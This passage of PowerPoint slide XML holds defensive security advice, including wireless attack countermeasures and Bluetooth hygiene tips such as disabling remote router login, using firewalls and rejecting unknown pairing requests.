                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="20055" y="5255"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="20055" y="5255"/>
                  <a:pt x="20054" y="5254"/>
                  <a:pt x="20054" y="5253"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="21464" y="3775"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="21463" y="3774"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="21547" y="3686"/>
                  <a:pt x="21600" y="3567"/>
                  <a:pt x="21600" y="3436"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="21600" y="3166"/>
                  <a:pt x="21380" y="2945"/>
                  <a:pt x="21109" y="2945"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="20969" y="2945"/>
                  <a:pt x="20844" y="3005"/>
                  <a:pt x="20755" y="3099"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="20754" y="3097"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="19493" y="4419"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="19492" y="4418"/>
                  <a:pt x="19491" y="4416"/>
                  <a:pt x="19490" y="4415"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="18805" y="5133"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="18806" y="5134"/>
                  <a:pt x="18807" y="5136"/>
                  <a:pt x="18807" y="5137"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="18807" y="5137"/>
                  <a:pt x="10792" y="13534"/>
                  <a:pt x="10792" y="1353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Lato Light" charset="0"/>
              <a:ea typeface="Lato Light" charset="0"/>
              <a:cs typeface="Lato Light" charset="0"/>
              <a:sym typeface="Gill Sans"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="38" name="Subtitle 2"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8558774" y="4745307"/>
            <a:ext cx="2797841" cy="617639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54381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65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Disable the network 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when not required</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="39" name="Shape 2540"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8257144" y="4821968"/>
            <a:ext cx="279328" cy="2793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32" y="6661"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="20540" y="6471"/>
                  <a:pt x="20228" y="6473"/>
                  <a:pt x="20038" y="6667"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="19903" y="6804"/>
                  <a:pt x="19870" y="7000"/>
                  <a:pt x="19929" y="7171"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="19918" y="7175"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="20365" y="8298"/>
                  <a:pt x="20618" y="951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cubicBezTo>
                  <a:pt x="5378" y="20618"/>
                  <a:pt x="982" y="16223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3575" y="982"/>
                  <a:pt x="16077" y="2136"/>
                  <a:pt x="17862" y="3989"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="17868" y="3982"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="18062" y="4157"/>
                  <a:pt x="18359" y="4153"/>
                  <a:pt x="18544" y="3965"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="18734" y="3771"/>
                  <a:pt x="18732" y="3461"/>
                  <a:pt x="18539" y="3270"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="18520" y="3252"/>
                  <a:pt x="18496" y="3244"/>
                  <a:pt x="18476" y="3230"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="16521" y="1241"/>
                  <a:pt x="13810" y="0"/>
                  <a:pt x="10800" y="0"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="4835" y="0"/>
                  <a:pt x="0" y="4835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5" y="21600"/>
                  <a:pt x="21600" y="16764"/>
                  <a:pt x="21600" y="10800"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="21600" y="9412"/>
                  <a:pt x="21329" y="8089"/>
                  <a:pt x="20851" y="6869"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="20828" y="6794"/>
                  <a:pt x="20793" y="6721"/>
                  <a:pt x="20732" y="6661"/>
                </a:cubicBezTo>
                <a:moveTo>
                  <a:pt x="10792" y="13534"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="6238" y="8980"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="6149" y="8891"/>
                  <a:pt x="6027" y="8836"/>
                  <a:pt x="5891" y="8836"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="5620" y="8836"/>
                  <a:pt x="5400" y="9056"/>
                  <a:pt x="5400" y="9327"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="5400" y="9463"/>
                  <a:pt x="5455" y="9585"/>
                  <a:pt x="5544" y="9675"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="10453" y="14583"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="10542" y="14672"/>
                  <a:pt x="10664" y="14727"/>
                  <a:pt x="10800" y="14727"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="10940" y="14727"/>
                  <a:pt x="11064" y="14668"/>
                  <a:pt x="11154" y="14574"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="11155" y="14576"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="19353" y="5988"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="19353" y="5989"/>
                  <a:pt x="19354" y="5990"/>
                  <a:pt x="19354" y="5991"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="20055" y="5255"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="20055" y="5255"/>
                  <a:pt x="20054" y="5254"/>
                  <a:pt x="20054" y="5253"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="21464" y="3775"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="21463" y="3774"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="21547" y="3686"/>
                  <a:pt x="21600" y="3567"/>
                  <a:pt x="21600" y="3436"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="21600" y="3166"/>
                  <a:pt x="21380" y="2945"/>
                  <a:pt x="21109" y="2945"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="20969" y="2945"/>
                  <a:pt x="20844" y="3005"/>
                  <a:pt x="20755" y="3099"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="20754" y="3097"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="19493" y="4419"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="19492" y="4418"/>
                  <a:pt x="19491" y="4416"/>
                  <a:pt x="19490" y="4415"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="18805" y="5133"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="18806" y="5134"/>
                  <a:pt x="18807" y="5136"/>
                  <a:pt x="18807" y="5137"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="18807" y="5137"/>
                  <a:pt x="10792" y="13534"/>
                  <a:pt x="10792" y="1353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Lato Light" charset="0"/>
              <a:ea typeface="Lato Light" charset="0"/>
              <a:cs typeface="Lato Light" charset="0"/>
              <a:sym typeface="Gill Sans"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="28" name="Title 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B669066E-8D3B-46B3-89DF-BEA494A22058}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="575945" y="328612"/>
            <a:ext cx="9909175" cy="58578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600" b="1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Wireless Attack Countermeasures</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" sz="3600" b="1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</a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="29" name="Subtitle 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8635875B-F749-40D6-80A2-ED9C4230E012}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="697870" y="5181600"/>
            <a:ext cx="2797841" cy="617639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54381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Disable </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" sz="165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remote router login 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and wireless administration</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="30" name="Shape 2540">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{94E10A0E-3B78-4633-8476-E28296676CFB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="396240" y="5258261"/>
            <a:ext cx="279328" cy="2793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32" y="6661"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="20540" y="6471"/>
                  <a:pt x="20228" y="6473"/>
                  <a:pt x="20038" y="6667"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="19903" y="6804"/>
                  <a:pt x="19870" y="7000"/>
                  <a:pt x="19929" y="7171"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="19918" y="7175"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="20365" y="8298"/>
                  <a:pt x="20618" y="951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cubicBezTo>
                  <a:pt x="5378" y="20618"/>
                  <a:pt x="982" y="16223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3575" y="982"/>
                  <a:pt x="16077" y="2136"/>
                  <a:pt x="17862" y="3989"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="17868" y="3982"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="18062" y="4157"/>
                  <a:pt x="18359" y="4153"/>
                  <a:pt x="18544" y="3965"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="18734" y="3771"/>
                  <a:pt x="18732" y="3461"/>
                  <a:pt x="18539" y="3270"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="18520" y="3252"/>
                  <a:pt x="18496" y="3244"/>
                  <a:pt x="18476" y="3230"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="16521" y="1241"/>
                  <a:pt x="13810" y="0"/>
                  <a:pt x="10800" y="0"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="4835" y="0"/>
                  <a:pt x="0" y="4835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5" y="21600"/>
                  <a:pt x="21600" y="16764"/>
                  <a:pt x="21600" y="10800"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="21600" y="9412"/>
                  <a:pt x="21329" y="8089"/>
                  <a:pt x="20851" y="6869"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="20828" y="6794"/>
                  <a:pt x="20793" y="6721"/>
                  <a:pt x="20732" y="6661"/>
                </a:cubicBezTo>
                <a:moveTo>
                  <a:pt x="10792" y="13534"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="6238" y="8980"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="6149" y="8891"/>
                  <a:pt x="6027" y="8836"/>
                  <a:pt x="5891" y="8836"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="5620" y="8836"/>
                  <a:pt x="5400" y="9056"/>
                  <a:pt x="5400" y="9327"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="5400" y="9463"/>
                  <a:pt x="5455" y="9585"/>
                  <a:pt x="5544" y="9675"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="10453" y="14583"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="10542" y="14672"/>
                  <a:pt x="10664" y="14727"/>
                  <a:pt x="10800" y="14727"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="10940" y="14727"/>
                  <a:pt x="11064" y="14668"/>
                  <a:pt x="11154" y="14574"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="11155" y="14576"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="19353" y="5988"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="19353" y="5989"/>
                  <a:pt x="19354" y="5990"/>
                  <a:pt x="19354" y="5991"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="20055" y="5255"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="20055" y="5255"/>
                  <a:pt x="20054" y="5254"/>
                  <a:pt x="20054" y="5253"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="21464" y="3775"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="21463" y="3774"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="21547" y="3686"/>
                  <a:pt x="21600" y="3567"/>
                  <a:pt x="21600" y="3436"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="21600" y="3166"/>
                  <a:pt x="21380" y="2945"/>
                  <a:pt x="21109" y="2945"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="20969" y="2945"/>
                  <a:pt x="20844" y="3005"/>
                  <a:pt x="20755" y="3099"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="20754" y="3097"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="19493" y="4419"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="19492" y="4418"/>
                  <a:pt x="19491" y="4416"/>
                  <a:pt x="19490" y="4415"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="18805" y="5133"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="18806" y="5134"/>
                  <a:pt x="18807" y="5136"/>
                  <a:pt x="18807" y="5137"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="18807" y="5137"/>
                  <a:pt x="10792" y="13534"/>
                  <a:pt x="10792" y="1353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Lato Light" charset="0"/>
              <a:ea typeface="Lato Light" charset="0"/>
              <a:cs typeface="Lato Light" charset="0"/>
              <a:sym typeface="Gill Sans"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="31" name="Subtitle 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{01B16C6A-45F1-47D3-804E-0B9E69F2BA18}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4640696" y="5270165"/>
            <a:ext cx="3439319" cy="871555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54381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Place a </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" sz="165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firewall or packet filter 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ingLiU_HKSCS" panose="02020500000000000000" pitchFamily="18" charset="-120"/>
                <a:cs typeface="Lato Light" charset="0"/>
              </a:rPr>
              <a:t>between the AP and the corporate Intranet</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="42" name="Shape 2540">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0FD31547-D6D7-4EB1-85A0-34B637BCBE50}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4339066" y="5346826"/>
            <a:ext cx="279328" cy="2793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32" y="6661"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="20540" y="6471"/>
                  <a:pt x="20228" y="6473"/>
                  <a:pt x="20038" y="6667"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="19903" y="6804"/>
                  <a:pt x="19870" y="7000"/>
                  <a:pt x="19929" y="7171"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="19918" y="7175"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="20365" y="8298"/>
                  <a:pt x="20618" y="951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cubicBezTo>
                  <a:pt x="5378" y="20618"/>
                  <a:pt x="982" y="16223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3575" y="982"/>
                  <a:pt x="16077" y="2136"/>
                  <a:pt x="17862" y="3989"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="17868" y="3982"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="18062" y="4157"/>
                  <a:pt x="18359" y="4153"/>
                  <a:pt x="18544" y="3965"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="18734" y="3771"/>
                  <a:pt x="18732" y="3461"/>
                  <a:pt x="18539" y="3270"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="18520" y="3252"/>
                  <a:pt x="18496" y="3244"/>
                  <a:pt x="18476" y="3230"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="16521" y="1241"/>
                  <a:pt x="13810" y="0"/>
                  <a:pt x="10800" y="0"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="4835" y="0"/>
                  <a:pt x="0" y="4835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5" y="21600"/>
                  <a:pt x="21600" y="16764"/>
                  <a:pt x="21600" y="10800"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="21600" y="9412"/>
                  <a:pt x="21329" y="8089"/>
                  <a:pt x="20851" y="6869"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="20828" y="6794"/>
                  <a:pt x="20793" y="6721"/>
                  <a:pt x="20732" y="6661"/>
                </a:cubicBezTo>
                <a:moveTo>
                  <a:pt x="10792" y="13534"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="6238" y="8980"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="6149" y="8891"/>
                  <a:pt x="6027" y="8836"/>
                  <a:pt x="5891" y="8836"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="5620" y="8836"/>
                  <a:pt x="5400" y="9056"/>
                  <a:pt x="5400" y="9327"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="5400" y="9463"/>
                  <a:pt x="5455" y="9585"/>
                  <a:pt x="5544" y="9675"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="10453" y="14583"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="10542" y="14672"/>
                  <a:pt x="10664" y="14727"/>
                  <a:pt x="10800" y="14727"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="10940" y="14727"/>
                  <a:pt x="11064" y="14668"/>
                  <a:pt x="11154" y="14574"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="11155" y="14576"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="19353" y="5988"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="19353" y="5989"/>
                  <a:pt x="19354" y="5990"/>
                  <a:pt x="19354" y="5991"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="20055" y="5255"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="20055" y="5255"/>
                  <a:pt x="20054" y="5254"/>
                  <a:pt x="20054" y="5253"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="21464" y="3775"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="21463" y="3774"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="21547" y="3686"/>
                  <a:pt x="21600" y="3567"/>
                  <a:pt x="21600" y="3436"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="21600" y="3166"/>
                  <a:pt x="21380" y="2945"/>
                  <a:pt x="21109" y="2945"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="20969" y="2945"/>
                  <a:pt x="20844" y="3005"/>
                  <a:pt x="20755" y="3099"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="20754" y="3097"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="19493" y="4419"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="19492" y="4418"/>
                  <a:pt x="19491" y="4416"/>
                  <a:pt x="19490" y="4415"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="18805" y="5133"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="18806" y="5134"/>
                  <a:pt x="18807" y="5136"/>
                  <a:pt x="18807" y="5137"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="18807" y="5137"/>
                  <a:pt x="10792" y="13534"/>
                  <a:pt x="10792" y="1353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Lato Light" charset="0"/>
              <a:ea typeface="Lato Light" charset="0"/>
              <a:cs typeface="Lato Light" charset="0"/>
              <a:sym typeface="Gill Sans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2009732E-755E-4656-86AF-0D3947DA5FC0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="846968" y="1705879"/>
            <a:ext cx="2588348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Best Practices for Configuration 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F38BAA4A-A85A-4A05-898D-BC38F08C1984}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4763866" y="1705879"/>
            <a:ext cx="2664296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Best Practices for </a:t>
            </a:r>
            <a:b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</a:b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SSID Settings</a:t>
            </a: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9868EA59-3509-4382-8EF2-FC8F83163EBF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8814241" y="1705879"/>
            <a:ext cx="2401491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Best Practices for Authentication</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="23716930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Placeholder 10" descr="A picture containing night sky&#10;&#10;Description automatically generated">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{96C9814D-7DD3-4457-B8C5-B808937C29BF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806" r="24806"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7239000" y="258"/>
            <a:ext cx="4953000" cy="6553200"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="66" name="Rectangle 65">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8289758F-38BF-47CD-8C2A-40EA5594462A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="955291" y="1386765"/>
            <a:ext cx="5674106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Use non-regular patterns as PIN keys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when pairing devices</a:t>
            </a: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E3481758-AC6E-44AB-B8DD-808D9FA75B9A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="955291" y="2239186"/>
            <a:ext cx="5293105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Keep your device in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non-discoverable (hidden) mode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DCB6493B-BC98-4BCD-A7B6-69FC05E38B54}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="955291" y="3091607"/>
            <a:ext cx="6131283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 NOT accept any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unknown and unexpected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pairing requests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4A0E630F-FEA1-42A1-A110-0BACB27267EE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="955291" y="3805529"/>
            <a:ext cx="5978907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Always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enable encryption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when establishing BT connection to your PC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C68DDD86-FA2C-427F-85E1-2CC0A973A172}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="955291" y="4657950"/>
            <a:ext cx="6131301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Keep a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check of all paired devices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 the past from time to time and delete any paired device that you are unsure of</a:t>
            </a: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FC727FB3-1006-4652-92BE-C1B00E4FB0A3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="955291" y="5648870"/>
            <a:ext cx="6131292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Keep BT in the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disabled state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and enable it only when needed</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p: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F879CEEB-A124-4B15-AD75-1C30988E524C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:stCxn id="134" idx="4"/>
            <a:endCxn id="132" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="621447" y="1771262"/>
            <a:ext cx="0" cy="450046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Straight Connector 113">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4E17EB47-D41A-48B7-8DAE-5238B24F73F0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:stCxn id="132" idx="4"/>
            <a:endCxn id="130" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="621447" y="2620970"/>
            <a:ext cx="0" cy="450046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984A1E5B-2C65-45EF-A58C-C50DC258B7A2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:stCxn id="130" idx="4"/>
            <a:endCxn id="128" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="621447" y="3470678"/>
            <a:ext cx="0" cy="450046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Straight Connector 115">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2B5A20D0-4A85-43D5-8CFF-89D7719808A4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:stCxn id="128" idx="4"/>
            <a:endCxn id="126" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="621447" y="4320386"/>
            <a:ext cx="0" cy="450046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Straight Connector 116">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E194E613-ED80-4C82-9E57-C438F9DE5253}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:stCxn id="126" idx="4"/>
            <a:endCxn id="124" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="621447" y="5170094"/>
            <a:ext cx="0" cy="450044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D3D56BC8-D873-4795-B5B2-415E510A9A94}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
